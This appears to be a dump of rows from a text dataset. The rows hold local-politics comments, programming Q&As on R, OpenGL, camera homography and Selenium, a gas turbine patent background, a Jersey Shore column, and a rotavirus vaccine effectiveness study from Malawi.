Dataset fields: text (string, lengths 2 to 1.05M), repo_name (string, lengths 5 to 101), path (string, lengths 4 to 991), language (string, 3 classes), license (string, 5 classes), size (int64, values 2 to 1.05M)
Under angry public pressure our current “progressive” majority just voted for a special meeting next week (not yet posted on the city website) to decide if the Carrington Corporation can: 1) Share the cost of a $450K traffic signal with the city. 2) Accept a city financed loan. 3) Enter into a “Revenue Guarantee” agreement requiring Eureka to pay the $450K if this development fails to generate adequate revenue. “NO”, “NO”, AND “NO”!!!! Even the Eureka Chamber of Commerce testified against it! CalTrans and the State of California are responsible for the safety of Hwy 101 through Eureka and will eventually install all the signals needed. They are slated to install one next year at Broadway and Hawthorne. We will need many consecutive progressive councils before they develop the courage to actually revitalize Eureka by finally holding the owners of blighted properties responsible to clean up their act or lose their property. That is a massive misinterpretation of what the city is trying to do. 1) These are separate options under consideration, not a package of ideas formed into a plan. As in, maybe give them a loan if they use it to pay for the light. So the developer pays for the light, with a city loan. 2) The “revenue guarantee” is meant as a guarantee that the city receives the promised tax revenue, not a guarantee that the city will pay the developer. 3) City staff recommended that the city pay for the light outright because it is considered a safe investment, so the council is trying to get a better deal (not giving a handout). Hopefully they will address the slow, painful downward trend in downtown and old town. Main Street badly needs revitalizing and a new direction. Its original mission has been eroded by over-controlling City managers and a director who is only a servant of City staff. That is not the way it was designed to work, folks. It no longer listens to the merchants’ issues, so they have learned to keep their mouths shut and heads down. Too bad, because it has the potential to be a very vibrant district. Let’s hope the new council sees its value (tax dollars), retires the current director, and gets someone with vision who takes a more hands-off approach. Hey, Tuluwat Examiner. Once all the votes have been counted, you should do a story about how much money Anthony “Fat Tony” Mantova 🍕 and John “The Fool” Fullerton spent per vote. 💰 Considering how badly both of those idiot Trumptards did in this election, that was money clearly not well spent! Seriously though. “Fat Tony” Mantova spent like $40,000 on a Eureka City Council race, if you can believe that corrupt bullshit! 🐘💰🔥. And Foolish Fullerton wasn’t far behind in the lighting-his-money-on-f**king-fire game 💰🔥.
null
minipile
NaturalLanguage
mit
null
Q: Replacing "NA" (NA string) with NA in place in data.table I have this dummy dataset: abc <- data.table(a = c("NA", "bc", "x"), b = c(1, 2, 3), c = c("n", "NA", "NA")) where I am trying to replace "NA" with standard NA, in place using data.table. I tried: for(i in names(abc)) (abc[which(abc[[i]] == "NA"), i := NA]) for(i in names(abc)) (abc[which(abc[[i]] == "NA"), i := NA_character_]) for(i in names(abc)) (set(abc, which(abc[[i]] == "NA"), i, NA)) However still with this I get: abc$a "NA" "bc" "x" What am I missing? EDIT: I tried @frank's answer in this question, which makes use of type.convert(). (Thanks frank; I didn't know of such an obscure albeit useful function.) In the documentation of type.convert() it is mentioned: "This is principally a helper function for read.table." so I wanted to test this thoroughly. This function comes with a small side effect when you have a complete column filled with "NA" (NA string). In such a case type.convert() converts the column to logical. For such a case abc will be: abc <- data.table(a = c("NA", "bc", "x"), b = c(1, 2, 3), c = c("n", "NA", "NA"), d = c("NA", "NA", "NA")) EDIT2: To summarize the code present in the original question: for(i in names(abc)) (set(abc, which(abc[[i]] == "NA"), i, NA)) works fine, but only in the current latest version of data.table (> 1.11.4). So if one is facing this problem then it's better to update data.table and use this code rather than type.convert(). A: I'd do... chcols = names(abc)[sapply(abc, is.character)] abc[, (chcols) := lapply(.SD, type.convert, as.is=TRUE), .SDcols=chcols] which yields > str(abc) Classes ‘data.table’ and 'data.frame': 3 obs. of 3 variables: $ a: chr NA "bc" "x" $ b: num 1 2 3 $ c: chr "n" NA NA - attr(*, ".internal.selfref")=<externalptr> Your DT[, i :=] code did not work because it creates a column literally named "i"; and your set code does work already, as @AdamSampson pointed out. (Note: OP upgraded from data.table 1.10.4-3 to 1.11.4 before this was the case on their comp.) so I wanted to test this thoroughly. This function comes with a small side effect when you have a complete column filled with "NA" (NA string). In such a case type.convert() converts the column to logical. Oh right. Your original approach is safer against this problem: # op's new example abc <- data.table(a = c("NA", "bc", "x"), b = c(1, 2, 3), c = c("n", "NA", "NA"), d = c("NA", "NA", "NA")) # op's original code for(i in names(abc)) set(abc, which(abc[[i]] == "NA"), i, NA) Side note: NA has type logical; and usually data.table would warn when assigning values of an incongruent type to a column, but I guess they wrote in an exception for NAs: DT = data.table(x = 1:2) DT[1, x := NA] # no problem, even though x is int and NA is logi DT = data.table(x = 1:2) DT[1, x := TRUE] # Warning message: # In `[.data.table`(DT, 1, `:=`(x, TRUE)) : # Coerced 'logical' RHS to 'integer' to match the column's type. Either change the target column ['x'] to 'logical' first (by creating a new 'logical' vector length 2 (nrows of entire table) and assign that; i.e. 'replace' column), or coerce RHS to 'integer' (e.g. 1L, NA_[real|integer]_, as.*, etc) to make your intent clear and for speed. Or, set the column type correctly up front when you create the table and stick to it, please.
null
minipile
NaturalLanguage
mit
null
The subject matter disclosed herein relates to gas turbines, and more particularly to a torque control system and method for gas turbine start-up. During a gas turbine startup, there are typically two sources of torque to accelerate the gas turbine to full speed with no load. One source is from the gas turbine itself after it is fired and the other source is from a starter, external to the gas turbine, typically a static starter. Conventionally, an average time taken by the gas turbine to reach full speed with no load can be reduced by changing the initial firing of the gas turbine. However, by changing the firing of the gas turbine, operating temperatures of the gas turbine can be increased, which can damage various hot gas path components. As such, it is typically desirable to increase starting torque of the gas turbine by the external static starter, which can be an electric motor or power converter, for example. However, many static starters have set operational points corresponding to set RPM settings, which do not take into account changing operational parameters of the gas turbine, which can increase the amount of time for the gas turbine to start up.
null
minipile
NaturalLanguage
mit
null
Have some Java3d code I would like to try to port to Xith3d. I would like to run some benchmarks. I installed as recommended by xith.orgWhen starting the demos (CubeTest, ...)I get an empty black screen. Hi I'm assuming that if xith is failing then there would be some kind of stack trace, somewhere. On the other hand a black screen is strange, it should either be light grey like a normal swing background (meaning xith has failed), or a darker grey, meaning xith has managed to get to GL, but something has gone wrong with the boxes. Either way there should be a stack trace somewhere. How are you launching it, from a dos prompt?. Another option is that it's a graphics card driver problem, were you running the directX version of java3d?, does the opengl version of java3d work?, do *any* opengl applications work?, what OS are you on?, what graphics card and drivers do you have? Every transformation requires a call to glLoadTransposeMatrixf, which was only added in 1.3. It's easy to fix, though, by pulling the data from the matrix already transposed and call glLoadMatrixf instead - that's what I've done. I don't know of any other places where >1.2 is used, but I don't deny the possibility. I also must state that I don't know how JoGL handles OpenGL extensions - might it use the GL_ARB_transpose_matrix extension if it's available? It's easy to fix, though, by pulling the data from the matrix already transposed and call glLoadMatrixf instead - that's what I've done. Do you have a patch that we can apply to Xith3D renderer classes? This is exactly what I was thinking to do, because of this also seems to be a reason for problems with SiS graphic cards. If you have a patch, can you please submit an issue with attachment? I will add an entension check and the transpose if it is available. It is more effiecient to use the transpose load because that is the way we store our matrices. I didn't want to incure the overhead of matrix transpose. Yuri, I'm afraid I can't see any way to attach files to issues or submit an attachment at time of report. Are we talking about the dev.java.net issues page? Quote I will add an entension check and the transpose if it is available. It is more effiecient to use the transpose load because that is the way we store our matrices. I didn't want to incure the overhead of matrix transpose. David, in this particular case it'll make no difference either way - the current code is this: That reminds me. I also checked in a feature which should make it easier to diagnose problems. two new options: TRACE and ERROR_CHECK can be activated in code or via -DXITH3D_ERROR_CHECK=TRUE, etc to have the opengl error codes checked on every call. TRACE writes to a debug file every call and its parameters. Heh, yeah I saw that as soon as I looked into the problem. I have checked in a fix to remove the use of loadTransposeMatrix. Should be all set. Excellent, thanks! The drawObjectShadow instance can't be fixed in-place so easily. As Transform3D.get(float[]) basically does the same as the code I quoted above, could I suggest a Transform3D.getTransposed(float[]) method? This would neatly fix the problem and remove the need for yet another of these blocks in the future as well. Thanks. Great fix. Could be that this will also fix some other compatibility issues I have on my check-list. cfmdobbie, Quote Yuri, I'm afraid I can't see any way to attach files to issues or submit an attachment at time of report. Are we talking about the dev.java.net issues page? 
Yes, we are talking about Issuezilla on dev.java.net. It should be [hopefully] possible to add an attachment after you submit an issue - just after submitting you get a confirmation page with an option to add an attachment.
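As a footnote to the transpose fix discussed in this thread, the sketch below (Python with NumPy, purely illustrative and not taken from the Xith3D code base) shows why transposing row-major matrix data before handing it to glLoadMatrixf gives the same result as calling glLoadTransposeMatrixf: glLoadMatrixf expects column-major data, glLoadTransposeMatrixf (OpenGL 1.3+) accepts row-major data, and a transpose converts one layout into the other.

import numpy as np

# A 4x4 transform stored row-major, the way the renderer keeps its matrices.
M = np.arange(16, dtype=np.float32).reshape(4, 4)

# Buffer glLoadTransposeMatrixf (OpenGL >= 1.3) would receive: row-major data.
row_major = M.flatten()

# The OpenGL 1.2-safe path: transpose first, then pass column-major data to
# glLoadMatrixf, which reads the buffer column by column.
column_major = M.T.flatten()

# Reading the column-major buffer back column-wise recovers the original
# matrix, so both calls load the identical transform.
assert np.array_equal(column_major.reshape(4, 4).T, M)

The only cost of this route is one extra transpose per matrix load, which is the overhead weighed in the thread above against adding a check for the GL_ARB_transpose_matrix extension.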
null
minipile
NaturalLanguage
mit
null
Q: On studying web programming What are the best resources to study the following: JavaScript, AJAX, CodeIgniter, Smarty? A: Though perhaps not suited as a first book on JavaScript, I recommend JavaScript - the Good Parts by Douglas Crockford. It will keep you from doing some dumb things. A: O'Reilly's JavaScript: The Definitive Guide, 5th Edition (or later) http://www.amazon.com/JavaScript-Definitive-Guide-David-Flanagan/dp/0596101996/ref=dp_ob_title_bk A: Digging into jQuery and using it is a great way to crash course into something more complex than "hello world" with JavaScript. In general, you will learn a lot if you just do stuff in this fashion. Pick a feature you think is cool. Google it to find a solution. Instead of copy/paste, make sure you understand what the code actually does, and how. Change it in some way to make sure your understanding is correct. Use Google to find out why your changes failed. Rinse/repeat.
null
minipile
NaturalLanguage
mit
null
Nostalgia is generally seen as the domain of the elderly, who long for a return to the simpler, more carefree days of the 1950s — the days of Bobby socks and bobbed hair, Doo Wop music and cars with personalities. But, as this month's Student Voices contest revealed, you are never too young to pine for the good old days. The question, "What is your favorite Shore town?" elicited responses filled with wonderful memories and, for many students, seemingly distant memories of their early days on the beaches and boardwalks. Most of the recollections spoke to the food, the ice cream, the amusements, and the treasured times with family and friends. It was the reflections on the latter that really jumped out. The nostalgia. The longing for the past. The connections with parents and other older family members who had spent time at many of the same Shore towns as their kids today. MORE: So lucky to be born by the Shore: Excerpts from student essays It's remarkable how early in one's life nostalgia kicks in. I was no different. And I've remained nostalgic about the Shore during nearly every phase of my life. As with most longtime New Jersey residents, the beach towns have been an important part of my life's narrative. My favorites changed over time, but my attraction to the water, beach and boardwalks never did. When I was a youngster, my family split our time at Sandlass Beach in Sea Bright, where you could swim in the ocean on one side of Ocean Avenue and in the bay on the other side; Asbury Park, where we visited my aunt, who vacationed every summer at the Berkeley Carteret; and Ocean Grove, where my parents had friends who, fortuitously for me, had a freckled, red-headed daughter who was my first crush. When I became old enough to drive, I usually headed to Sandy Hook with my high school sweetheart during the day and to Asbury Park or Seaside Heights for the rides and other amusements at night. During my college days, most of my time was spent in Asbury Park, usually to attend concerts at the Convention Center — The Rolling Stones, Jefferson Airplane and Mitch Ryder still provide vivid memories. From then on, until the time I had children of my own, most of my precious vacation time was spent traveling the world — often in search of the best beaches. I found plenty of them, in the Caribbean, and central and South America: in Anguilla, Cuba, Margarita Island, Panama, British Virgin Islands, Brazil, Dominican Republic and elsewhere. When my wife and I began our family — all three kids are teenagers now — my focus returned to the beaches of my youth. Early on, my youngest son and I spent a lot of time in Asbury Park, where the beaches and boardwalk were largely deserted and the parking was plentiful and free — even on Ocean Avenue. Today, when we return to the city's resurrected oceanfront, it's mostly to play pinball at Silverball Museum or to ride bikes on the boardwalk stretch from Asbury Park, to Ocean Grove, to Bradley Beach, to Avon, and to Belmar early on summer mornings or late in the off-season. Sunday morning rides through the streets of Ocean Grove are particularly sublime. Another favorite trip down memory lane is to Sandy Hook, where the kids enjoy bike riding on the trails at the former Fort Hancock. That day generally ends with dinner at a seafood restaurant in the Highlands. As the kids grew older, their interest in go-karts, boardwalk games and junk food made us gravitate toward Point Pleasant Beach, Seaside Heights and Atlantic City. 
We also made an excursion to Keansburg — my first visit there in more than six decades in New Jersey. Today, most of our trips to the Shore are to Point Pleasant Beach — mostly for the seafood restaurants and ambiance, and to Long Beach Island, which until I started patronizing it regularly in recent years, had only visited once as an adult — a fall weekend at the Engleside Inn in Beach Haven. Today, LBI is our preferred destination. We generally visit later in summer days, after the sun has cooled down and the crowds (and badge checkers) have dispersed. We spend a couple of hours on the beach at Harvey Cedars, then head to Barnegat Light for dinner at Off the Hook, which has the best scallops on the planet, freshly loaded off the fleet of scallop boats next door at Viking Village. At least once or twice a season, we take the evening cruise on Miss Barnegat Light, which never gets stale for any of us. When it comes to the Jersey Shore, Bruce Springsteen had it right: Everything is all right. Nostalgia is a big part of it. If you've lived here long enough, having it come full circle with your children is as good as it gets. Randy Bergmann, a Westfield native and lifelong resident of New Jersey, has been covering the state as a reporter, editor and opinion page editor for four decades. Contact him at [email protected] or 732-643-4034.
null
minipile
NaturalLanguage
mit
null
Q: Estimating camera angles using homography I've been trying to estimate the Euler angles (Rotz(yaw)*Roty(pitch)*Rotx(roll)) of a UAV from the homography between two frames. This means that the rotation I get from each frame to the previous one has to be multiplied by the previous one to get the total rotation with respect to the initial axes. So: R_accumulated=R01*R12*... Those R are obtained from decomposeHomography() in OpenCV. According to REP and the OpenCV homography page, the camera reference is Z forward, X right and Y down, but my UAV reference system is ENU. The question is how to get the drone orientation from that R_accumulated. The R_accumulated from the homography tells you how to convert one plane into another. So if I want the camera orientation, does the camera have to do the opposite movement to get the same result (inv(R_accumulated))? Then should that camera orientation matrix be transformed to ENU coordinates? I have tried doing this with several rotations but I do not get good results. The best one I've had is by getting the angles directly from R_accumulated and exchanging pitch and roll. That's a very good estimation, but I still need to know some kind of rotation matrix from the camera frame to the UAV one. I don't know if you have understood me. A: Finally, I have the solution to my problem: If the UAV axes are different from those of the camera, we have to find a matrix R1 that transforms UAV axes into camera ones and another one that does the same task the other way around, from camera axes to UAV axes, R2. The homography returns the value of translation and rotation that should be applied to the first PICTURE to get the second one. But we want the camera pose, not the picture one. So, for example, if the z axis is pointing at an object which has an arrow pointing upwards, a 90º rotation of the IMAGE around that forward axis will make the arrow point right. But this is not the rotation the camera has to do to get the arrow pointing right. If you want the arrow pointing right you have to rotate the camera -90º along that same axis. In conclusion, the camera movement is the inverse of the image's, so the camera rotation will be the inverse of the homography rotation and the translation will be -1*(homography_translation) * scale_factor. Suppose we have a rotation R between the initial image and the final one. If we want to obtain the Euler angles (preferably called Tait-Bryan) as Rotz * Roty * Rotx of the UAV, we have to calculate the Euler angles of R1 * inv(R) * R2. That R is the multiplication of all the intermediate rotations between frames, so that R = Rinit * ... * Rend
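A rough Python/OpenCV sketch of the recipe in the answer above is shown here. It is only a sketch under several assumptions: the camera intrinsic matrix K is known, the axis-change matrices R1 (UAV/ENU axes to camera axes) and R2 (camera axes back to UAV axes) below are hypothetical examples for a forward-looking, north-facing camera, and the disambiguation of the up-to-four solutions returned by cv2.decomposeHomographyMat is skipped by simply taking the first candidate.

import numpy as np
import cv2

def rotation_between_frames(H, K):
    # cv2.decomposeHomographyMat returns up to four candidate (R, t, n)
    # triples; a real application must pick the physically valid one
    # (e.g. via the visibility constraint). The first candidate is taken
    # here purely for illustration.
    _, rotations, _, _ = cv2.decomposeHomographyMat(H, K)
    return rotations[0]

def tait_bryan_zyx(R):
    # Yaw/pitch/roll (Z-Y-X Tait-Bryan) angles of R = Rotz(yaw)*Roty(pitch)*Rotx(roll).
    yaw = np.arctan2(R[1, 0], R[0, 0])
    pitch = np.arcsin(-R[2, 0])
    roll = np.arctan2(R[2, 1], R[2, 2])
    return yaw, pitch, roll

# Hypothetical axis changes: R1 maps UAV (ENU) coordinates into camera
# coordinates (Z forward, X right, Y down) for a camera looking north;
# R2 is the inverse mapping.
R1 = np.array([[1.0, 0.0, 0.0],
               [0.0, 0.0, -1.0],
               [0.0, 1.0, 0.0]])
R2 = R1.T

def uav_angles(homographies, K):
    # Accumulate the frame-to-frame rotations, invert the result (the camera
    # moves opposite to the image), then express it in UAV axes as
    # R1 * inv(R_accumulated) * R2 before extracting the angles.
    R_accumulated = np.eye(3)
    for H in homographies:
        R_accumulated = R_accumulated @ rotation_between_frames(H, K)
    return tait_bryan_zyx(R1 @ R_accumulated.T @ R2)

Each per-frame homography H could come, for instance, from cv2.findHomography on feature matches between consecutive frames; note that the actual OpenCV function name is decomposeHomographyMat rather than decomposeHomography.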
null
minipile
NaturalLanguage
mit
null
Q: selenium web driver no longer working correctly I am using the selenium module in Python and it has been working as expected until I had to update Firefox today. After the Firefox update, every time webdriver.Firefox() is assigned to the variable driver, the Firefox web browser opens in a default page and then the Python program stalls waiting without executing the rest of the code. I am new to selenium so I do not know if there is a workaround for this. from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC driver = webdriver.Firefox() driver.get(#somewebsite) A: You need to upgrade selenium to 2.45, which was released today. Check out: https://pypi.python.org/pypi/selenium or pip install -U selenium
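Since the fix hinges on the installed version, a small hedged sketch is shown below: it prints the Selenium version before launching the browser (2.45 or newer is what the answer calls for) and wraps the page load in an explicit wait so a stalled start-up fails after a timeout instead of hanging. The URL is a placeholder standing in for the #somewebsite from the question.

import selenium
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

# The answer recommends selenium >= 2.45 for the updated Firefox.
print("selenium version:", selenium.__version__)

driver = webdriver.Firefox()
try:
    driver.get("https://example.com")  # placeholder for #somewebsite
    # Fail after 15 seconds instead of blocking indefinitely.
    WebDriverWait(driver, 15).until(
        EC.presence_of_element_located((By.TAG_NAME, "body"))
    )
finally:
    driver.quit()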
null
minipile
NaturalLanguage
mit
null
Rotavirus remains a major cause of severe dehydration, diarrhea, and death among children \<5 years of age in many low-income countries. After the introduction of Rotarix (Glaxo SmithKline, <https://www.gsksource.com>) rotavirus vaccine into Malawi's immunization schedule in October 2012, enhanced surveillance combined with case--control studies have described the substantial population impact and effectiveness of Rotarix on hospitalized rotavirus disease and diarrheal deaths ([@R1],[@R2]). Both of the globally available rotavirus vaccines, Rotarix and RotaTeq (Merck & Co., <https://www.merckvaccines.com>), have been shown to protect against rotaviruses with a broad range of G and P types, as defined by the 2 viral outer-capsid proteins ([@R3],[@R4]). A whole-genome classification system describes rotavirus strains more completely by assigning genotypes to each of its 11 double-stranded RNA segments ([@R5]). Most rotavirus strains contain either a Wa (G1-P\[8\]-I1-R1-C1-M1-A1-N1-T1-E1-H1) or DS-1 (G2-P\[4\]-I2-R2-C2-M2-A2-N2-T2-E2-H2) genotype constellation ([@R6]). Typically, G1P\[8\] strains, including the Rotarix strain (RIX4414), possess a Wa-like genetic backbone, whereas G2P\[4\] strains generally have a DS-1--like genotype constellation ([@R6]). A switch in predominant rotavirus genotype from G1P\[8\] to G2P\[4\] after Rotarix introduction has been described in various settings ([@R7],[@R8]), and higher vaccine effectiveness (VE) against G1P\[8\] strains has been described compared with G2P\[4\] in some settings ([@R2],[@R9]). It is not known whether these changes in strain distribution and strain-specific differences in VE are related to differences in cross-protection afforded by the outer capsid proteins (G and P type) or to the distinct genetic backbones possessed by DS-1--like strains and the Wa-like Rotarix strain. Previously, we demonstrated that all G1P\[8\] strains detected before Rotarix introduction in Malawi had a Wa-like genetic backbone ([@R10]). Shortly after Rotarix introduction, atypical DS-1--like G1P\[8\] rotavirus strains were detected, which provided an opportunity to examine whether emergence of DS-1--like G1P\[8\] strains could be the result of reduced protection afforded by the Wa-like G1P\[8\] Rotarix vaccine. The Study ========= We used enzyme immunoassay (EIA) to detect rotaviruses in stool samples collected from children \<5 years of age with acute gastroenteritis at Queen Elisabeth Central Hospital (QECH; Blantyre, Malawi) ([@R2]). We used reverse transcription PCR to assign G and P genotypes to rotavirus-positive samples ([@R10],[@R11]). Samples with sufficient volume and containing G1 (n = 110), G2 (n = 64), or other (G4, G9, or G12, n = 42) rotavirus strains were selected at random during January 2013--December 2015. We generated rotavirus whole-genome sequences (WGS) using the HiSeq 2000 platform (Illumina Inc., <https://www.illumina.com>) as described previously ([@R10]). We derived consensus sequences using Geneious (<https://www.geneious.com>) and genotyped them using RotaC (<http://rotac.regatools.be>). All complete nucleotide sequences generated in this study were deposited into GenBank ([@R12]) (accession nos. MG181227--941). We calculated rotavirus VE using logistic regression to compare 2-dose versus 0-dose vaccination status among hospitalized strain-specific rotavirus diarrhea case-patients and concurrently hospitalized control patients with non--rotavirus-caused diarrhea, matched by age at admission. 
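To make the vaccine effectiveness (VE) calculation used throughout this article concrete, the short sketch below (Python; the counts are invented purely for illustration and are not the study data) shows the underlying relationship VE = (1 - odds ratio) x 100% in a test-negative case-control design. The study itself estimated the odds ratio with logistic regression comparing 2-dose versus 0-dose vaccination among age-matched cases and controls, adjusted for year of presentation, which this toy calculation does not reproduce.

import numpy as np

# Hypothetical 2x2 counts: fully vaccinated (2 doses) vs unvaccinated,
# among strain-specific case-patients and rotavirus test-negative controls.
cases_vacc, cases_unvacc = 10, 3
ctrls_vacc, ctrls_unvacc = 365, 45

# Odds ratio of vaccination in cases relative to controls.
odds_ratio = (cases_vacc / cases_unvacc) / (ctrls_vacc / ctrls_unvacc)

# Vaccine effectiveness: VE = (1 - OR) * 100%.
ve = (1.0 - odds_ratio) * 100.0

# Wald 95% CI on the log odds-ratio scale, transformed to the VE scale
# (bounds swap because VE decreases as the odds ratio increases).
se_log_or = np.sqrt(1/cases_vacc + 1/cases_unvacc + 1/ctrls_vacc + 1/ctrls_unvacc)
log_or = np.log(odds_ratio)
or_low, or_high = np.exp(log_or - 1.96 * se_log_or), np.exp(log_or + 1.96 * se_log_or)
print(f"VE = {ve:.1f}% (95% CI {100*(1-or_high):.1f}% to {100*(1-or_low):.1f}%)")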
We defined concurrency of controls for each endpoint ([Table](#T1){ref-type="table"}) as any patient hospitalized for diarrhea who tested negative for rotavirus occurring in the same date range (between the first and last hospitalized strain-specific case) in which cases of strain-specific rotavirus were detected. We limited VE analysis to infants \<12 months of age because previous analysis did not demonstrate statistically significant protection in the second year of life (VE 31.7%, 95% CI −140.6% to 80.6%) ([@R2]). We obtained ethics approval from the National Health Sciences Research Committee, Malawi (867), and the Research Ethics Committee of the University of Liverpool, Liverpool, UK (000490). ###### Point estimates of vaccine effectiveness by rotavirus genotype constellation based on the complete genetic composition of rotavirus strains, Blantyre, Malawi\*
Rotavirus strain type | Sequenced strains from test-positive case-patients† | Rotavirus test-negative controls | VE, % (95% CI), adjusted for year of presentation | p value
DS-1--like G1P\[8\] | 13, 13, 10 (76.9) | 426, 410, 365 (89) | 85.6 (34.4--96.8) | 0.01
DS-1--like G2 | 30, 28, 24 (85.7) | 481, 465, 411 (88.4) | 48.5 (−154.3 to 89.6) | 0.42
Wa-like G1 | 38, 38, 34 (89.5) | 440, 424, 376 (88.7) | 76.7 (−153.8 to 97.9) | 0.23
\*Rotavirus strains detected at Queen Elisabeth Central Hospital during January 2013--December 2015. Case-patients were fully vaccinated infants \<12 mo of age.
†Complete whole-genome sequences were generated. Of 216 rotavirus strains sequenced, 114 (53%) had a Wa-like and 88 (44%) a DS-1--like genotype constellation. Among Wa-like strains, 72% were G1, \<1% were G2, and 25% were G12. Of the DS-1--like strains, 31% were G1 and 69% were G2. Of the 110 G1 strains analyzed by WGS, 75% were Wa-like and 25% were DS-1--like. We detected atypical G1 rotaviruses with DS-1--like genotype constellation in Malawi in 2013; their circulation peaked in 2014 and subsequently decreased in 2015 (\<1%, 1/72) ([Figure](#F1){ref-type="fig"}). ![Monthly number of rotavirus cases at Queen Elisabeth Central Hospital, Blantyre, Malawi. Numbers are based on the presence of either DS-1--like (A) or Wa-like (B) constellation of rotavirus strains.](19-0258-F){#F1} In logistic regression analysis adjusted for year of presentation, Rotarix effectiveness against DS-1--like G1P\[8\] rotavirus was 85.6% (95% CI 34.4%--96.8%; p = 0.01). Effectiveness estimates against Wa-like G1 (VE 76.7%, 95% CI −153.8% to 97.9%) and DS-1--like G2 (VE 48.5%, 95% CI −154.3% to 89.6%) rotaviruses included wide bounds and the null value ([Table](#T1){ref-type="table"}). Conclusions =========== Atypical DS-1--like G1 rotavirus strains emerged in Malawi shortly after Rotarix vaccine introduction ([@R10]). Although strain oscillation and emergence of novel types have been reported globally in the absence of vaccination, the mechanisms driving this phenomenon are not well understood. It is possible that the emergence of these DS-1--like G1P\[8\] strains was coincidental with vaccine introduction. The high VE strongly suggests that escape from vaccine-induced immunity is not the driver for emergence. The swift decline in prevalence of these strains is in contrast with more sustained changes in strain circulation described in other settings in the context of high VE ([@R13]). The decline could have been precipitated by the observed high VE or may represent a natural phenomenon related to viral fitness and associated periodic nature of the circulation of the DS-1--like strains, which has been observed historically and globally in the absence of vaccine. These findings support continued use of rotavirus vaccine in this population as an intervention to reduce severe diarrhea caused by rotavirus strains possessing either Wa-like or DS-1--like genetic backbones. The observed decline in rotavirus hospitalizations in children after vaccine introduction ([@R2]), together with reduction in infant diarrhea deaths in Malawi ([@R14]), are public health benefits that could be sustained through rotavirus vaccination in this region, which has one of the highest burdens of rotavirus disease. The VE against DS-1--like G1P\[8\] strains in this study resembles our previous findings of VE of 82% (95% CI 42%--95%) against all G1P\[8\] strains 3 years after vaccine introduction (2013--2015) ([@R2]). In contrast, we were unable to demonstrate statistically significant VE against DS-1--like G2 rotaviruses despite a comparable number of such strains, consistent with our earlier study (VE 45.9%, 95% CI −47.0% to 80.1%; p = 0.228) ([@R2]). The apparently lower VE against rotavirus disease caused by DS-1--like strains associated with G2, but not with G1P\[8\], lends support to the proposed dominant role of the outer capsid proteins VP7 and VP4 as drivers of homotypic protection. 
Although increasing evidence suggests that Rotarix vaccine does not provide the same degree of protection against G2 strains as G1 strains, this difference in protection appears to have little effect on total VE among populations in which vaccination performs optimally and high VE is maintained. However, the difference in protection between the strains may exacerbate underperformance of rotavirus vaccines in low-resource settings such as Malawi, where overall VE is generally lower for reasons that remain poorly understood ([@R2],[@R15]). We could not demonstrate statistically significant effectiveness against Wa-like G1P\[8\] rotaviruses (p = 0.23). Wa-like G1P\[8\] cases became dominant and replaced DS-1--like G1P\[8\] once vaccine coverage had reached high and stable levels ([Figure](#F1){ref-type="fig"}). At high population vaccine coverage, case--control analysis of VE became challenging and difficult to power sufficiently. Our data demonstrate that Rotarix provides a high degree of protection against severe disease caused by homotypic G1P\[8\] rotaviruses in Malawi regardless of genomic backbone. VE for patients \<1 year of age is comparable to that seen in middle-income countries. The lower VE against heterotypic G2P\[4\] strains previously described ([@R15]) suggests that more detailed immune response studies, clarification of the correlates of protection for rotavirus disease, and strain surveillance are needed to monitor the impact of sustained, high vaccine coverage on rotavirus strain distribution. *Suggested citation for this article*: Jere KC, Bar-Zeev N, Chande A, Bennett A, Pollock L, Sanchez-Lopez PF, et al. Vaccine effectiveness against DS-1--like rotavirus strains in infants with acute gastroenteritis, Malawi, 2013--2015. Emerg Infect Dis. 2019 Sep \[*date cited*\]. <https://doi.org/10.3201/eid2509.190258> These authors contributed equally to this article. We thank the laboratory staff at the Malawi-Liverpool-Wellcome Trust Clinical Research Programme and the sequencing and informatics teams at the Centre for Genomic Research (CGR), University of Liverpool, UK. This work was supported by an investigator-initiated research grant from GlaxoSmithKline Biologicals SA (eTrack no. 207219) and by the Wellcome Trust (Programme grant no. 091909/Z/10/Z and the MLW Programme Core Award). K.C.J. is a Wellcome Trust Training Fellow (grant no. 201945/Z/16/Z). M.I.-G. is partly supported by the NIHR HPRU in Gastrointestinal Infections. Author contributions: K.C.J., N.B.-Z., N.A.C., and M.I.-G. conceived and designed the study. K.C.J. and N.B.-Z. collected clinical data and stool samples. K.C.J. performed the laboratory work. K.C.J. and N.B.-Z. carried out the statistical analyses. K.C.J. drafted the manuscript, with major input from N.A.C. and M.I.-G. All authors contributed to interpretation of the data and commented on the manuscript. All authors have read and approved the final manuscript. Disclaimer: The funders had no role in the study design, data collection and interpretation, or the decision to submit the work for publication. GlaxoSmithKline Biologicals SA was provided the opportunity to review a preliminary version of this manuscript for factual accuracy, but the authors are solely responsible for final content and interpretation. The authors received no financial support or other form of compensation related to the development of the manuscript. M. I.-G. 
is affiliated with the National Institute for Health Research Health Protection Research Unit in Gastrointestinal Infections at University of Liverpool in partnership with Public Health England, in collaboration with University of East Anglia, University of Oxford, and the Quadram Institute. The views expressed are those of the author(s) and not necessarily those of the NHS, the NIHR, the Department of Health or Public Health, England. Potential conflicts of interest: K.C.J., N.B.-Z. and N.F. have received investigator-initiated research grant support from the GSK group of companies. M.I.-G. has received investigator-initiated research grant support from the GSK group of companies and Sanofi Pasteur Merck Sharpe & Dohme and Merck. O.N. has received research grant support and honoraria from Japan Vaccine and MSD for delivering lectures on rotavirus vaccines. N.A.C. has received research grant support and honoraria for participation in rotavirus vaccine data safety monitoring committee meetings from the GSK group of companies. All other authors report no potential conflicts. Dr. Jere is a Wellcome International Training Fellow who conducted this research as part of his postdoctoral studies. His research interests are in enteric viral pathogens.
null
minipile
NaturalLanguage
mit
null
